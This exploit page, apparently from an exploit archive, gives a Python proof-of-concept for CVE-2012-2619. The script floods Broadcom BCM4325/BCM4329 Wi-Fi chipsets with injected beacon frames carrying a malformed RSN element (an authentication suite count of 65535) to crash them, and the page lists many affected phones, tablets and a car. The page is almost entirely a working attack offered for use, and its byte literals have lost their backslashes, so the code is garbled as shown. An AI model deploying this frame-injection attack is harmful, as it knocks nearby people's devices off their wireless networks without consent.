Home / exploits Broadcom BCM4325 / BCM4329 Denial Of Service
Posted on 16 November 2012
# Exploit Author: CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, # Vendor Homepage: # Software Link: [download link if available] # Version: 1.0 # Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HTC Droid Incredible Samsung Spica Acer Liquid Motorola Devour VehÃculo Ford Edge Dispositivos afectados con el chipset BCM4329: Apple iPhone 4 Apple iPhone 4 Verizon Apple iPod 3G Apple iPad Wi-Fi Apple iPad 3G Apple iPad 2 Apple Tv 2G Motorola Xoom Motorola Droid X2 Motorola Atrix Samsung Galaxy Tab Samsung Galaxy S 4G Samsung Nexus S Samsung Stratosphere Samsung Fascinate HTC Nexus One HTC Evo 4G HTC ThunderBolt HTC Droid Incredible 2 LG Revolution Sony Ericsson Xperia Play Pantech Breakout Nokia Lumina 800 Kyocera Echo Asus Transformer Prime Malata ZPad" # CVE : 2012-2619 #!/usr/bin/env python import sys import time import struct import PyLorcon2 def beaconFrameGenerator(): sequence = 0 while(1): sequence = sequence % 4096 # Frame Control frame = 'x80' # Version: 0 - Type: Managment - Subtype: Beacon frame += 'x00' # Flags: 0 frame += 'x00x00' # Duration: 0 frame += 'xffxffxffxffxffxff' # Destination: ff:ff:ff:ff:ff:ff frame += 'x00x00x00x15xdexad' # Source: 00:00:00:15:de:ad frame += 'x00x00x00x15xdexad' # BSSID: 00:00:00:15:de:ad frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: #part of the generator # Frame Body frame += struct.pack('Q', time.time()) # Timestamp frame += 'x64x00' # Beacon Interval: 0.102400 seconds frame += 'x11x04' # Capability Information: ESS, Privacy, #Short Slot time # Information Elements # SSID: buggy frame += 'x00x05buggy' # Supported Rates: 1,2,5.5,11,18,24,36,54 frame += 'x01x08x82x84x8bx96x24x30x48x6c' # DS Parameter Set: 6 frame += 'x03x01x06' # RSN IE frame += 'x30' # ID: 48 frame += 'x14' # Size: 20 frame += 'x01x00' # Version: 1 frame += 'x00x0fxacx04' # Group cipher suite: TKIP frame += 'x01x00' # Pairwise cipher suite count: 1 frame += 'x00x0fxacx00' # Pairwise cipher suite 1: TKIP frame += 'xffxff' # Authentication suites count: 65535 frame += 'x00x0fxacx02' # Pairwise authentication suite 2: PSK frame += 'x00x00' sequence += 1 yield frame if __name__ == "__main__": if len(sys.argv) != 2: print "Usage:" print " %s <wireless interface>" % sys.argv[0] sys.exit(-1) iface = sys.argv[1] context = PyLorcon2.Context(iface) context.open_injmon() generator = beaconFrameGenerator() for i in range(10000): frame = generator.next() time.sleep(0.100) context.send_bytes(frame)
